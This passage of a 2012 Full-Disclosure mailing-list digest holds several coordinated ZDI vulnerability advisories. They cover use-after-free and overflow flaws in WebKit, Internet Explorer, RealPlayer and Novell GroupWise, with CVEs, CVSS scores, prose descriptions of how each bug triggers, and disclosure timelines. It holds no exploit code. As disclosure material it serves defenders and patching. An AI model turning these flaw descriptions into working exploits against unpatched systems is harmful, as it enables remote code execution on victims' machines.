malicious page or open a malicious file.<br />
<br />
<br />
The specific flaw exists within the library's implementation of a HTMLMedia<br />
element. After a source element is created, an attacker can catch the<br />
beforeLoad event before the element is used, and delete the element. The<br />
pointer to the source element will then be referenced causing a<br />
use-after-free condition, which can lead to code execution under the<br />
context of the application.<br />
<br />
<br />
- -- Vendor Response:<br />
WebKit.Org has issued an update to correct this vulnerability. More details<br />
can be found at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
<br />
- -- Disclosure Timeline:<br />
2012-03-14 - Vulnerability reported to vendor<br />
2012-12-21 - Coordinated public release of advisory<br />
<br />
<br />
- -- Credit:<br />
This vulnerability was discovered by:<br />
* pa_kt / twitter.com/pa_kt<br />
<br />
<br />
<br />
- -- About the Zero Day Initiative (ZDI):<br />
Established by TippingPoint, The Zero Day Initiative (ZDI) represents<br />
a best-of-breed model for rewarding security researchers for responsibly<br />
disclosing discovered vulnerabilities.<br />
<br />
<br />
Researchers interested in getting paid for their security research<br />
through the ZDI can find more information and sign-up at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
The ZDI is unique in how the acquired vulnerability information is<br />
used. TippingPoint does not re-sell the vulnerability details or any<br />
exploit code. Instead, upon notifying the affected product vendor,<br />
TippingPoint provides its customers with zero day protection through<br />
its intrusion prevention technology. Explicit details regarding the<br />
specifics of the vulnerability are not exposed to any parties until<br />
an official vendor patch is publicly available. Furthermore, with the<br />
altruistic aim of helping to secure a broader user base, TippingPoint<br />
provides this vulnerability information confidentially to security<br />
vendors (including competitors) who have a vulnerability protection or<br />
mitigation product.<br />
<br />
<br />
Our vulnerability disclosure policy is available online at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
Follow the ZDI on Twitter:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
-----BEGIN PGP SIGNATURE-----<br />
Version: PGP Desktop 10.2.0 (Build 1950)<br />
Charset: utf-8<br />
<br />
<br />
wsBVAwUBUNRXVlVtgMGTo1scAQL8swgAm/RnsOnH3MOpjeTII0WcvV9txZO0itaC<br />
yRlwICYXXHUUVvuSxlN8KS7P6Wmf5F0gj+VQXP647KhCxIhXZsrx+DL+aZS+Fb17<br />
pcHGwZFhntNNPn5Gwgy8c0cZeSBVmGByU5BBDT6e3ciGpyidlAzUOga63ahOKN22<br />
HSi4uiwHn4WX4gxpLt0Yyd14Ro1fdtqi7puUc+KGuzVtBwWypv023ubuPz/qRZ85<br />
L9R+n+SfoCHL/o2kEHaoM3xpRQeKiAkxRCwS7SVGq8ltnckI3kkdl38t3SfxmjIQ<br />
yAsYkKbYIkZgHbFhFPfffNhBa8YSdcp4YTMjH2Cjqbrh2TElnhH7Jg==<br />
=FjqC<br />
-----END PGP SIGNATURE-----<br />
<br />
<br />
-------------- next part --------------<br />
An HTML attachment was scrubbed...<br />
URL: [<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>] <br />
<br />
------------------------------<br />
<br />
<br />
Message: 5<br />
Date: Fri, 21 Dec 2012 06:36:00 -0600<br />
From: ZDI Disclosures &lt;full-disclosure@lists.grok.org.uk&gt;<br />
Subject: [Full-disclosure] ZDI-12-192 : Microsoft Internet Explorer<br />
insertRow Remote Code Execution Vulnerability<br />
To: Full Disclosure &lt;full-disclosure@lists.grok.org.uk&gt;, BugTraq<br />
&lt;full-disclosure@lists.grok.org.uk&gt;, <a href="mailto:&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;">&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;</a><br />
Message-ID: &lt;full-disclosure@lists.grok.org.uk&gt;<br />
Content-Type: text/plain; charset=&quot;iso-8859-1&quot;<br />
<br />
<br />
-----BEGIN PGP SIGNED MESSAGE-----<br />
Hash: SHA1<br />
<br />
<br />
ZDI-12-192 : Microsoft Internet Explorer insertRow Remote Code Execution<br />
Vulnerability<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
December 21, 2012<br />
<br />
<br />
- -- CVE ID:<br />
CVE-2012-1880<br />
<br />
<br />
- -- CVSS:<br />
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P<br />
<br />
<br />
- -- Affected Vendors:<br />
Microsoft<br />
<br />
<br />
- -- Affected Products:<br />
Microsoft Internet Explorer<br />
<br />
<br />
<br />
- -- TippingPoint(TM) IPS Customer Protection:<br />
TippingPoint IPS customers have been protected against this<br />
vulnerability by Digital Vaccine protection filter ID 12382.<br />
For further product information on the TippingPoint IPS, visit:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
- -- Vulnerability Details:<br />
This vulnerability allows remote attackers to execute arbitrary code on<br />
vulnerable installations of Microsoft Internet Explorer. User interaction<br />
is required to exploit this vulnerability in that the target must visit a<br />
malicious page or open a malicious file.<br />
<br />
<br />
The specific flaw exists within the way Internet Explorer handles<br />
consecutive calls to insertRow. When the number of rows reaches a certain<br />
threshold the program fails to correctly relocate certain key objects. This<br />
can lead to a use-after-free vulnerability which can result in remote code<br />
execution under the context of the current process.<br />
<br />
<br />
- -- Vendor Response:<br />
Microsoft has issued an update to correct this vulnerability. More details<br />
can be found at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
<br />
- -- Disclosure Timeline:<br />
2012-03-14 - Vulnerability reported to vendor<br />
2012-12-21 - Coordinated public release of advisory<br />
<br />
<br />
- -- Credit:<br />
This vulnerability was discovered by:<br />
* Anonymous<br />
<br />
<br />
<br />
- -- About the Zero Day Initiative (ZDI):<br />
Established by TippingPoint, The Zero Day Initiative (ZDI) represents<br />
a best-of-breed model for rewarding security researchers for responsibly<br />
disclosing discovered vulnerabilities.<br />
<br />
<br />
Researchers interested in getting paid for their security research<br />
through the ZDI can find more information and sign-up at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
The ZDI is unique in how the acquired vulnerability information is<br />
used. TippingPoint does not re-sell the vulnerability details or any<br />
exploit code. Instead, upon notifying the affected product vendor,<br />
TippingPoint provides its customers with zero day protection through<br />
its intrusion prevention technology. Explicit details regarding the<br />
specifics of the vulnerability are not exposed to any parties until<br />
an official vendor patch is publicly available. Furthermore, with the<br />
altruistic aim of helping to secure a broader user base, TippingPoint<br />
provides this vulnerability information confidentially to security<br />
vendors (including competitors) who have a vulnerability protection or<br />
mitigation product.<br />
<br />
<br />
Our vulnerability disclosure policy is available online at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
Follow the ZDI on Twitter:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
-----BEGIN PGP SIGNATURE-----<br />
Version: PGP Desktop 10.2.0 (Build 1950)<br />
Charset: utf-8<br />
<br />
<br />
wsBVAwUBUNRXqlVtgMGTo1scAQIolwgAlfWawonK1BetraIK8viDhg/z4Eb5RTse<br />
hOfWDOxNdY0glskLeI1ylrtr0nXJSvj+8q5T6DcsEaz48nEdsv/ObO+d6JREzwTL<br />
3gUJ9fUeMWZubmUmm2cKkgdenmEkK0p8EZqQ5puUpuVffeFC/f8Dn679MGlwL73v<br />
Zato0rHoJuBedfxOYsQ+UkYwre97ickYkw/dl0LMgce5IRxKROnsR3u4+yPUVOWt<br />
Vqo0zEPXKGdPUY3L/AjgowwqvOGsf0OmQESBLZi+pGhO2PxWjb5aBm+gFPBkRpNl<br />
ON1yduQfblrmsrCEHZf/od/A/r7YyLeI4dxkOGb0vR7FmBr2OcZfBA==<br />
=/GjQ<br />
-----END PGP SIGNATURE-----<br />
<br />
<br />
-------------- next part --------------<br />
An HTML attachment was scrubbed...<br />
URL: [<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>] <br />
<br />
------------------------------<br />
<br />
<br />
Message: 6<br />
Date: Fri, 21 Dec 2012 06:37:28 -0600<br />
From: ZDI Disclosures &lt;full-disclosure@lists.grok.org.uk&gt;<br />
Subject: [Full-disclosure] ZDI-12-193 : Microsoft Internet Explorer<br />
insertAdjacentText Remote Code Execution Vulnerability<br />
To: Full Disclosure &lt;full-disclosure@lists.grok.org.uk&gt;, BugTraq<br />
&lt;full-disclosure@lists.grok.org.uk&gt;, <a href="mailto:&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;">&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;</a><br />
Message-ID: &lt;full-disclosure@lists.grok.org.uk&gt;<br />
Content-Type: text/plain; charset=&quot;iso-8859-1&quot;<br />
<br />
<br />
-----BEGIN PGP SIGNED MESSAGE-----<br />
Hash: SHA1<br />
<br />
<br />
ZDI-12-193 : Microsoft Internet Explorer insertAdjacentText Remote Code<br />
Execution Vulnerability<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
December 21, 2012<br />
<br />
<br />
- -- CVE ID:<br />
CVE-2012-1879<br />
<br />
<br />
- -- CVSS:<br />
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P<br />
<br />
<br />
- -- Affected Vendors:<br />
Microsoft<br />
<br />
<br />
<br />
- -- Affected Products:<br />
Microsoft Internet Explorer<br />
<br />
<br />
<br />
- -- TippingPoint(TM) IPS Customer Protection:<br />
TippingPoint IPS customers have been protected against this<br />
vulnerability by Digital Vaccine protection filter ID 12383.<br />
For further product information on the TippingPoint IPS, visit:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
- -- Vulnerability Details:<br />
This vulnerability allows remote attackers to execute arbitrary code on<br />
vulnerable installations of Microsoft Internet Explorer. User interaction<br />
is required to exploit this vulnerability in that the target must visit a<br />
malicious page or open a malicious file.<br />
<br />
<br />
The specific flaw exists within the way Internet Explorer handles repeated<br />
calls to insertAdjacentText. When the size of the element reaches a certain<br />
threshold Internet Explorer fails to correctly relocate key elements. An<br />
unitialized variable in one of the function can cause memory corruption.<br />
This can lead to remote code execution under the context of the program.<br />
<br />
<br />
- -- Vendor Response:<br />
Microsoft has issued an update to correct this vulnerability. More details<br />
can be found at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
<br />
- -- Disclosure Timeline:<br />
2012-03-14 - Vulnerability reported to vendor<br />
2012-12-21 - Coordinated public release of advisory<br />
<br />
<br />
<br />
- -- Credit:<br />
This vulnerability was discovered by:<br />
* Anonymous<br />
<br />
<br />
- -- About the Zero Day Initiative (ZDI):<br />
Established by TippingPoint, The Zero Day Initiative (ZDI) represents<br />
a best-of-breed model for rewarding security researchers for responsibly<br />
disclosing discovered vulnerabilities.<br />
<br />
<br />
Researchers interested in getting paid for their security research<br />
through the ZDI can find more information and sign-up at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
The ZDI is unique in how the acquired vulnerability information is<br />
used. TippingPoint does not re-sell the vulnerability details or any<br />
exploit code. Instead, upon notifying the affected product vendor,<br />
TippingPoint provides its customers with zero day protection through<br />
its intrusion prevention technology. Explicit details regarding the<br />
specifics of the vulnerability are not exposed to any parties until<br />
an official vendor patch is publicly available. Furthermore, with the<br />
altruistic aim of helping to secure a broader user base, TippingPoint<br />
provides this vulnerability information confidentially to security<br />
vendors (including competitors) who have a vulnerability protection or<br />
mitigation product.<br />
<br />
<br />
Our vulnerability disclosure policy is available online at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
Follow the ZDI on Twitter:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
-----BEGIN PGP SIGNATURE-----<br />
Version: PGP Desktop 10.2.0 (Build 1950)<br />
Charset: utf-8<br />
<br />
<br />
wsBVAwUBUNRYAlVtgMGTo1scAQLIzwgAifwtcC6Rt0S7xdrcLHpBiw+vrM598Ccl<br />
UBkbArcNGipQLDGVgW6sC3h0gPGayQbaQsyW8J1ar6MNUWmfKnEJetAUa24ZgDWl<br />
cOATZkDyf0HYwV6a+gATJA4CVJk6cHYjf4Pn9vkguogBebsBMX3mGBLsrSfbcxQc<br />
1tOfbV7VogCOHceFLNxVx8Ir8/rpHfbfduflYFPbSLcKgcERcLq5kGJOZkiNPRID<br />
kRs8dd6vfjEyueO5/NwyPXi9mNaDqNCYgelRCGi3xF/FjabtuV3BVbS81NDoJ8Ak<br />
O3VFfeHisnRN/ZvPs84fEdfWG5lDy5fzNgEtsTP4+zOMfws21I/7uA==<br />
=2V0z<br />
-----END PGP SIGNATURE-----<br />
<br />
<br />
-------------- next part --------------<br />
An HTML attachment was scrubbed...<br />
URL: [<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>] <br />
<br />
------------------------------<br />
<br />
<br />
Message: 7<br />
Date: Fri, 21 Dec 2012 06:39:02 -0600<br />
From: ZDI Disclosures &lt;full-disclosure@lists.grok.org.uk&gt;<br />
Subject: [Full-disclosure] ZDI-12-194 : Microsoft Internet Explorer<br />
OnBeforeDeactivate Event Remote Code Execution Vulnerability<br />
To: Full Disclosure &lt;full-disclosure@lists.grok.org.uk&gt;, BugTraq<br />
&lt;full-disclosure@lists.grok.org.uk&gt;, <a href="mailto:&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;">&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;</a><br />
Message-ID: &lt;full-disclosure@lists.grok.org.uk&gt;<br />
Content-Type: text/plain; charset=&quot;iso-8859-1&quot;<br />
<br />
<br />
-----BEGIN PGP SIGNED MESSAGE-----<br />
Hash: SHA1<br />
<br />
<br />
ZDI-12-194 : Microsoft Internet Explorer OnBeforeDeactivate Event Remote<br />
Code Execution Vulnerability<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
December 21, 2012<br />
<br />
<br />
- -- CVE ID:<br />
CVE-2012-1878<br />
<br />
<br />
- -- CVSS:<br />
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P<br />
<br />
<br />
- -- Affected Vendors:<br />
Microsoft<br />
<br />
<br />
- -- Affected Products:<br />
Microsoft Internet Explorer<br />
<br />
<br />
<br />
- -- TippingPoint(TM) IPS Customer Protection:<br />
TippingPoint IPS customers have been protected against this<br />
vulnerability by Digital Vaccine protection filter ID 12388.<br />
For further product information on the TippingPoint IPS, visit:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
- -- Vulnerability Details:<br />
This vulnerability allows remote attackers to execute arbitrary code on<br />
vulnerable installations of Microsoft Internet Explorer. User interaction<br />
is required to exploit this vulnerability in that the target must visit a<br />
malicious page or open a malicious file.<br />
<br />
<br />
The specific flaw exists within the way Internet Explorer handles the<br />
onbeforedeactivate callback function for certain elements. During the<br />
execution of the onbeforedeactivate callback function it is possible to<br />
alter the DOM tree of the page which can lead to a use-after-free<br />
vulnerability when the function returns. This can result in remote code<br />
execution under the context of the current process.<br />
<br />
<br />
- -- Vendor Response:<br />
Microsoft has issued an update to correct this vulnerability. More details<br />
can be found at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
<br />
- -- Disclosure Timeline:<br />
2012-03-14 - Vulnerability reported to vendor<br />
2012-12-21 - Coordinated public release of advisory<br />
<br />
<br />
- -- Credit:<br />
This vulnerability was discovered by:<br />
* Anonymous<br />
<br />
<br />
<br />
- -- About the Zero Day Initiative (ZDI):<br />
Established by TippingPoint, The Zero Day Initiative (ZDI) represents<br />
a best-of-breed model for rewarding security researchers for responsibly<br />
disclosing discovered vulnerabilities.<br />
<br />
<br />
Researchers interested in getting paid for their security research<br />
through the ZDI can find more information and sign-up at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
The ZDI is unique in how the acquired vulnerability information is<br />
used. TippingPoint does not re-sell the vulnerability details or any<br />
exploit code. Instead, upon notifying the affected product vendor,<br />
TippingPoint provides its customers with zero day protection through<br />
its intrusion prevention technology. Explicit details regarding the<br />
specifics of the vulnerability are not exposed to any parties until<br />
an official vendor patch is publicly available. Furthermore, with the<br />
altruistic aim of helping to secure a broader user base, TippingPoint<br />
provides this vulnerability information confidentially to security<br />
vendors (including competitors) who have a vulnerability protection or<br />
mitigation product.<br />
<br />
<br />
Our vulnerability disclosure policy is available online at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
Follow the ZDI on Twitter:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
-----BEGIN PGP SIGNATURE-----<br />
Version: PGP Desktop 10.2.0 (Build 1950)<br />
Charset: utf-8<br />
<br />
<br />
wsBVAwUBUNRYXVVtgMGTo1scAQIroAgAt/563d86coSO3lzRBv3abXO4+lC1IhEJ<br />
DOGYcqAPqJ7IIURCpFI6k+8CqRa6gG+HZIv7WrIyiZnya7HcC64Kb6stQjL2aaTw<br />
lrAa9J5FsuWyOW7/1UM7nfJ06EXe0splcFFNYVjdjJlNSI0RClzQNYNreLtGbDbB<br />
Gqve1qSbbGwmb8b9nxkfsgrd0nA1jNyJULfd0OLAg5WRZkoFyvKG3UXEBPPslUtH<br />
uOBG1mb8S7l0zfweTVObNQlie23ccgr9Yd97HcH8lc3fUW4W/gROgk54J4gocmZz<br />
Jk+xYyAlAa8p0ejV0Y7BY2VoBDYiYPSNH2Kz65b+ecK81BFera9xbA==<br />
=dDcB<br />
-----END PGP SIGNATURE-----<br />
<br />
<br />
-------------- next part --------------<br />
An HTML attachment was scrubbed...<br />
URL: [<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>] <br />
<br />
------------------------------<br />
<br />
<br />
Message: 8<br />
Date: Fri, 21 Dec 2012 06:40:48 -0600<br />
From: ZDI Disclosures &lt;full-disclosure@lists.grok.org.uk&gt;<br />
Subject: [Full-disclosure] ZDI-12-195 : RealNetworks RealPlayer ATRAC<br />
Sample Decoding Remote Code Execution Vulnerability<br />
To: Full Disclosure &lt;full-disclosure@lists.grok.org.uk&gt;, BugTraq<br />
&lt;full-disclosure@lists.grok.org.uk&gt;, <a href="mailto:&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;">&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;</a><br />
Message-ID: &lt;full-disclosure@lists.grok.org.uk&gt;<br />
Content-Type: text/plain; charset=&quot;iso-8859-1&quot;<br />
<br />
<br />
-----BEGIN PGP SIGNED MESSAGE-----<br />
Hash: SHA1<br />
<br />
<br />
ZDI-12-195 : RealNetworks RealPlayer ATRAC Sample Decoding Remote Code<br />
Execution Vulnerability<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
December 21, 2012<br />
<br />
<br />
- -- CVE ID:<br />
CVE-2012-0928<br />
<br />
<br />
- -- CVSS:<br />
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P<br />
<br />
<br />
- -- Affected Vendors:<br />
RealNetworks<br />
<br />
<br />
- -- Affected Products:<br />
RealNetworks RealPlayer<br />
<br />
<br />
<br />
- -- TippingPoint(TM) IPS Customer Protection:<br />
TippingPoint IPS customers have been protected against this<br />
vulnerability by Digital Vaccine protection filter ID 12482.<br />
For further product information on the TippingPoint IPS, visit:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
- -- Vulnerability Details:<br />
This vulnerability allows remote attackers to execute arbitrary code on<br />
vulnerable installations of RealNetworks Real Player. User interaction is<br />
required to exploit this vulnerability in that the target must visit a<br />
malicious page or open a malicious file.<br />
<br />
<br />
The specific flaw exists when the application attempts to decode an audio<br />
sample that is encoded with the ATRAC codec. While parsing sample data, the<br />
application will explicitly trust 2-bits as a loop counter which can be<br />
used to write outside the bounds of the target buffer. This can lead to<br />
code execution under the context of the application.<br />
<br />
<br />
- -- Vendor Response:<br />
RealNetworks has issued an update to correct this vulnerability. More<br />
details can be found at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
<br />
- -- Disclosure Timeline:<br />
2011-10-28 - Vulnerability reported to vendor<br />
2012-12-21 - Coordinated public release of advisory<br />
<br />
<br />
<br />
- -- Credit:<br />
This vulnerability was discovered by:<br />
* Andrzej Dyjak<br />
<br />
<br />
<br />
- -- About the Zero Day Initiative (ZDI):<br />
Established by TippingPoint, The Zero Day Initiative (ZDI) represents<br />
a best-of-breed model for rewarding security researchers for responsibly<br />
disclosing discovered vulnerabilities.<br />
<br />
<br />
Researchers interested in getting paid for their security research<br />
through the ZDI can find more information and sign-up at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
The ZDI is unique in how the acquired vulnerability information is<br />
used. TippingPoint does not re-sell the vulnerability details or any<br />
exploit code. Instead, upon notifying the affected product vendor,<br />
TippingPoint provides its customers with zero day protection through<br />
its intrusion prevention technology. Explicit details regarding the<br />
specifics of the vulnerability are not exposed to any parties until<br />
an official vendor patch is publicly available. Furthermore, with the<br />
altruistic aim of helping to secure a broader user base, TippingPoint<br />
provides this vulnerability information confidentially to security<br />
vendors (including competitors) who have a vulnerability protection or<br />
mitigation product.<br />
<br />
<br />
Our vulnerability disclosure policy is available online at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
Follow the ZDI on Twitter:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
-----BEGIN PGP SIGNATURE-----<br />
Version: PGP Desktop 10.2.0 (Build 1950)<br />
Charset: utf-8<br />
<br />
<br />
wsBVAwUBUNRYylVtgMGTo1scAQIvqwf+InLpJWTUfaN65tPUF5tIc5bkT3QBCEe6<br />
tkvHCcTDLyftl1dBgXSkiy8wtCYrcDp0pWaOHYXtlRTzOxOZA4hjf2Tn66EPYVBy<br />
JPKFWnTrkHhlC6Bc/6l44LeVtV/LcygPtANr4J7FNqWfIUZ4eaV1NLqGra7tm4hJ<br />
kW/Vn8Syno9+WICi1FbV23KLeSvooRqvHtiNCKhsrKqFOyOBfSQlMO6Gp+n0j8JF<br />
Bl1XfWPEGRM6do4I/+1Sk9GuyKT6Smu8qcwT6X2334UHYfEHZLGDlHgNiAtB++XE<br />
KAamtcf8JRIMxT05hwJl8T10U5LiKucuxTr/gVT86niHTDPG2+A0Cg==<br />
=77vg<br />
-----END PGP SIGNATURE-----<br />
<br />
<br />
-------------- next part --------------<br />
An HTML attachment was scrubbed...<br />
URL: [<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>] <br />
<br />
------------------------------<br />
<br />
<br />
Message: 9<br />
Date: Fri, 21 Dec 2012 06:42:25 -0600<br />
From: ZDI Disclosures &lt;full-disclosure@lists.grok.org.uk&gt;<br />
Subject: [Full-disclosure] ZDI-12-196 : Novell Groupwise GWIA<br />
ber_get_stringa Remote Code Execution Vulnerability<br />
To: Full Disclosure &lt;full-disclosure@lists.grok.org.uk&gt;, BugTraq<br />
&lt;full-disclosure@lists.grok.org.uk&gt;, <a href="mailto:&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;">&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;</a><br />
Message-ID: &lt;full-disclosure@lists.grok.org.uk&gt;<br />
Content-Type: text/plain; charset=&quot;iso-8859-1&quot;<br />
<br />
<br />
-----BEGIN PGP SIGNED MESSAGE-----<br />
Hash: SHA1<br />
<br />
<br />
ZDI-12-196 : Novell Groupwise GWIA ber_get_stringa Remote Code Execution<br />
Vulnerability<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
December 21, 2012<br />
<br />
<br />
- -- CVE ID:<br />
CVE-2012-0417<br />
<br />
<br />
- -- CVSS:<br />
10, AV:N/AC:L/Au:N/C:C/I:C/A:C<br />
<br />
<br />
- -- Affected Vendors:<br />
Novell<br />
<br />
<br />
- -- Affected Products:<br />
Novell Groupwise<br />
<br />
<br />
<br />
- -- TippingPoint(TM) IPS Customer Protection:<br />
TippingPoint IPS customers have been protected against this<br />
vulnerability by Digital Vaccine protection filter ID 12495.<br />
For further product information on the TippingPoint IPS, visit:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
- -- Vulnerability Details:<br />
This vulnerability allows remote attackers to execute arbitrary code on<br />
vulnerable installations of Novell Groupwise. Authentication is not<br />
required to exploit this vulnerability.<br />
<br />
<br />
The flaw exists within the Groupwise Internet Agent component, specifically<br />
the optional LDAP server which listens on tcp port 389. When parsing a BER<br />
encoded parameter the specified size is used to allocate a destination<br />
buffer. A properly encoded BER chunk could cause an integer size value to<br />
wrap before buffer allocation. A remote attacker can exploit this<br />
vulnerability to execute arbitrary code under the context of the SYSTEM<br />
account.<br />
<br />
<br />
- -- Vendor Response:<br />
<br />
<br />
Novell has issued an update to correct this vulnerability. More details can<br />
be found at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
<br />
- -- Disclosure Timeline:<br />
2011-10-21 - Vulnerability reported to vendor<br />
2012-12-21 - Coordinated public release of advisory<br />
<br />
<br />
- -- Credit:<br />
This vulnerability was discovered by:<br />
* Francis Provencher From Protek Research Lab's<br />
<br />
<br />
- -- About the Zero Day Initiative (ZDI):<br />
Established by TippingPoint, The Zero Day Initiative (ZDI) represents<br />
a best-of-breed model for rewarding security researchers for responsibly<br />
disclosing discovered vulnerabilities.<br />
<br />
<br />
Researchers interested in getting paid for their security research<br />
through the ZDI can find more information and sign-up at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
